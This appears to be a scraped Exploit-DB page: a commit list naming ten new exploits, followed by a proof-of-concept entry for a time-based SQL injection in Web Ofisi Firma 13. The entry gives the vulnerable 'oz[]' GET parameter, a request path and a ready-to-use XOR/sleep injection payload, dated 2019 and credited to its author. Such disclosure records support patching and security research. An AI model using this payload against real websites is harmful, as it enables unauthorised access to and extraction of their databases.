7ec7ea72de
10 changes to exploits/shellcodes MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter) fuelCMS 1.4.1 - Remote Code Execution Web Ofisi E-Ticaret 3 - 'a' SQL Injection Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection Web Ofisi Emlak 2 - 'ara' SQL Injection Web Ofisi Emlak 3 - 'emlak_durumu' SQL Injection Web Ofisi Firma Rehberi 1 - 'il' SQL Injection Web Ofisi Rent a Car 3 - 'klima' SQL Injection Web Ofisi Firma 13 - 'oz' SQL Injection REDCap < 9.1.2 - Cross-Site Scripting
13 lines
No EOL
476 B
Text
13 lines
No EOL
476 B
Text
# Exploit Title: Web Ofisi Firma 13 - 'oz' SQL Injection
|
|
# Date: 2019-07-19
|
|
# Exploit Author: Ahmet Ümit BAYRAM
|
|
# Vendor: https://www.web-ofisi.com/detay/kurumsal-firma-v13-sinirsiz-dil.html
|
|
# Demo Site: http://demobul.net/firmav13/
|
|
# Version: v13
|
|
# Tested on: Kali Linux
|
|
# CVE: N/A
|
|
|
|
----- PoC: SQLi -----
|
|
Request: http://localhost/[PATH]/kategori/ikinci-el-klima.html?oz[]=1_1
|
|
Vulnerable Parameters: oz[] (GET)
|
|
Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z |